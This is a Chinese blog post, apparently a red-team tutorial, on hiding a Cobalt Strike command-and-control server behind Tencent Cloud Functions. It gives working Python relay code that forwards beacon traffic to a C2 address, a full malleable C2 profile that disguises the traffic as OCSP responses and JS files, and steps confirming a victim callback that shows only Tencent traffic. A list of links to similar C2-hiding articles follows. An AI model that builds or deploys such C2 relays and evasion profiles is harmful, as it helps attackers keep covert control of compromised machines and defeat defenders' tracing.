使用腾讯云函数隐藏C2

最新推荐文章于 2024-09-08 14:30:00 发布
最新推荐文章于 2024-09-08 14:30:00 发布
阅读量5.1k 收藏 9
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/113826579
版权

背景

基于CS,隐藏C2服务端有很多手段,常见如下:

  • 利用域前置
  • 走cdn域名
  • 利用云厂商服务
    其中域前置技术在18年及更早还比较有效,现在越来越多云厂商如cloudflare开始禁止域前置行为:
    在这里插入图片描述
    因此走cdn和利用云厂商服务是更加常用的方法

核心思想

核心思想其实很简单,就是由第三方提供的服务接收C2客户端流量,转发给C2服务端,避免直接暴露服务端,因此该第三方服务最好具备以下特点:

  • 国内外访问速度都较快(客户端可能有国外情况)
  • 国外厂商
  • 价格便宜或完全免费
  • 主动提供免费加速域名
    若使用cdn加速技术,可考虑freenom+cloudfront,完全免费。
    本文以腾讯云函数+API网关为例,腾讯云函数作用就是用户可以不申请云机器,却可直接写代码(支持python/c等),将特定请求进行处理或进一步转发。API网关即类似接口作用,将满足路由条件的请求转发给云函数处理。

腾讯云函数隐藏C2

所需组件:

  • CS 4.1版本
  • 腾讯云账号(API网关第一年免费)
  1. 函数服务->函数管理处,使用python3.6语言,创建一个hello word模板,使用python将所接受请求转发给我们的C2服务端 ,点击部署,代码如下:
    其中main_handler函数的event包含了请求的头等数据。
    在这里插入图片描述
# coding: utf8
import json,requests,base64
def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        C2='http://45.xx.xx.45:80'
        if 'path' in event.keys():
            path=event['path']
        if 'headers' in event.keys():    
            headers=event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
            resp=requests.get(C2+path,headers=headers,verify=False) 
        else:
            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
            print(resp.headers)
            print(resp.content)
        response={
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            "body": str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        return response
  1. 函数服务->触发管理->创建触发器,具体参数如下,触发器作用是用来触发刚刚我们写的云函数
    在这里插入图片描述
  2. 创建完触发器后,点击API服务名,跳转到API网关页面,点击编辑,配置网关的路由
    在这里插入图片描述
    在这里插入图片描述
  3. 仅修改路径为/就可以,其他配置不用动
    在这里插入图片描述
  4. 点击立即完成,发布服务即可
    在这里插入图片描述
    6.新增C2的profile文件,命名为win_tecent_cloud_func.profile
set sample_name "t";
set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}
  1. 服务端启动
    在这里插入图片描述
  2. 将云函数的公网接口地址域名填入listener的http hosts和stager的hosts
    在这里插入图片描述

在这里插入图片描述
9.成功上线
在这里插入图片描述
10. wireshark抓包受害机,可以看到都是和腾讯host和ip的通讯
在这里插入图片描述
在这里插入图片描述
11. 走https同理,云函数那边python代码记得改成https。可以看到为加密流量
在这里插入图片描述

ATpiu
关注
专栏目录
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
杨秀璋的专栏
11-01 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。这篇文章换个口味,将分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。
【防溯源】利用腾讯云隐藏连接Webshell的真实IP
Ms08067安全实验室
08-10 802
文章来源|MS08067安全实验室本文作者:大方子(MS08067实验室核心成员)因为腾讯云函数自带CDN,这样我们可以通过腾讯云函数来转发我们的Webshell请求,从而达到隐藏真实IP...
函数隐藏c2服务器
weixin_44747030的博客
01-15 8744
学习记录
初识函数
最新发布
littleschemer的博客
09-08 937
函数(SCF)是一种无服务器(Serverless)计算服务,它允许开发者在不管理服务器的情况下运行代码。本文使用腾讯云演示函数与层的使用,同时记录选择java构建层问题的疑难杂症。
手把手教你如何隐藏C2
Ms08067安全实验室
05-19 1227
文章来源|MS08067 公众号读者投稿本文作者:下次一定(白嫖知识星球活动)CDN技术隐藏C2原理让cdn转发合法的http或者https流量来达到隐藏的目的。这些文章写的很详细,总结一...
隐藏C2服务器IP的各种方法总结
sweelg的博客
09-18 959
利用CDN、域前置、重定向三种技术隐藏C2的区别_Shanfenglan's blog-CSDN博客_域前置 前言 这个课题前段时间已经分别做过研究,但没有写三者的区别分析,以为自己可以将三种技术永远记在心里,但是事实是确实淡忘一部分知识点,导致现在对三者的理解出现偏差。 反思:以后倘若需要做技术记录,一定要详细详细再详细,有备无患。不能抱有侥幸心理,因为你永远不知道,问题与遗忘哪一个会先来 对于三种隐藏技术的理解 CDN技术隐藏C2 反溯源-cs和msf域名上线 利用CDN隐藏C2地址 使用CDN
HW红队攻防基础建设—C2 IP隐匿技术
撸起袖子加油干
04-16 2208
前记 随着HW的开始,蓝队弟弟们见识到了很多奇特的操作,本文主要从监测溯源时比较常见的一些红队的隐匿手法进行讲解。在实际攻防中有效的隐匿我们的C2主机也是很必要的,在工作的同时发现很多蓝队对此并不熟悉,所以本文会深入浅出的讲解三种常见的方式,希望通过本文能够对各位有所帮助。 域前置 域前置技术就是通过CDN节点将流量转发到真实的C2服务器,其中CDN节点ip通过识别请求的Host头进行流量转发。这里作者利用阿里全站加速CDN实现任意HOST头修改,利用构造高信誉域名,从而实现绕过流量...
【溯源反制】CDN&域前置&函数-流量分析|溯源
今天是几号的博客
05-12 4218
1、不备案的域名+禁用不必要的域名解析记录(防止被溯源收集到更多信息)2、使用HTTPS通讯3、C2服务器混淆基础特征-修改profile配置文件,修改ssl证书4、CS服务端防火墙做策略,仅允许目标主机网段连接,防止其他网段主机对其进行扫描,防溯源5、加跳板、代理等,当然最重要的是免杀了……
红队培训班作业 | CS和MSF的进阶实战使用
Ms08067安全实验室
07-29 598
文章来源|MS08067 红队培训班第11节课作业本文作者:汤浩荡(红队培训班学员)按老师要求完成布置的作业如下:环境准备: Kali linux:cs客户端即msf。 阿...
数据竞赛专题 | 从赛题理解到竞赛入门基础
Datawhale
07-28 2482
为了帮助更多竞赛选手入门进阶比赛,通过数据竞赛提升理论实践能力和团队协作能力。DataFountain 和 Datawhale 联合邀请了数据挖掘,CV,NLP领域多位竞...
隐藏你的C2使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器)
Love&Share
12-17 3188
本文将会介绍使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器
【红队APT】反朔源隐藏&C2项目&CDN域前置&函数&数据中转&DNS转发
今天是几号的博客
04-19 3432
区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装,效果要更上一层楼!可以看到这里正常上线,也是简单的进行流量代理,这里我把上面的iptables转发配置清空了,避免干扰 注: 如果中转服务器被拿下的话,那么搜集信息很可能就可以发现请求重定向的痕迹,从而找到真实C2地址。 请求重定向也可以和之前的CDN方法相结合,之前CDN方法是通过CDN将请求转发到真实的C2服务器上,而添加请求重定向后,流程就变为了CDN转发到中转服务器,中转服务器再转到C2,达到双重隐藏的效果。
域前置技术和C2隐藏
蚁景网安学院
11-09 1558
域前置又译为域名幌子,是一种隐藏连接真实端点来规避的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。
函数(变相代理池)的三种常见利用
dzqxwzoe的博客
02-22 633
之前学到一些函数的利用,感觉很有趣,于是借此篇来总结一下三种对函数的简单利用方式。
函数实现隐藏c2地址
milu_Sec的博客
12-30 676
说明:函数是一个可以为开发者提供的无服务器执行代码的环境,相当于我们可以提前部署一个函数,当我们需要运行这段代码的时候只需要通过去请求某一个特定的地址(即函数地址)就可以运行了。最后,该函数将响应的状态码、标头和正文转换为一个 JSON 对象,并将其返回给调用方。配置代码写如下代码,c2地址填写 协议+ip+port,如http://127.0.0.1:80,本文使用80端口,所以后续使用http beacon。该函数的目的是将传入的 HTTP 请求转发到指定的 URL,并将响应返回给调用方。
CS函数及上线提醒
热门推荐
LiBai'S BLOG
11-12 1万+
CS函数及上线提醒
利用腾讯云函数上线CS
渗透测试研究中心
02-02 575
首先,我们需要登录腾讯云,开启函数。登录腾讯云后,搜索函数。开通即可。初次登录,需要授权。登录控制台后,点击新建。函数名称随意,选择从头开始,环境填Python3.6,选完后下拉,把代码搞里头。复制下面代码,并修改服务器地址。# coding: utf8 import json,requests,base64 def main_handler(event, context): res...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值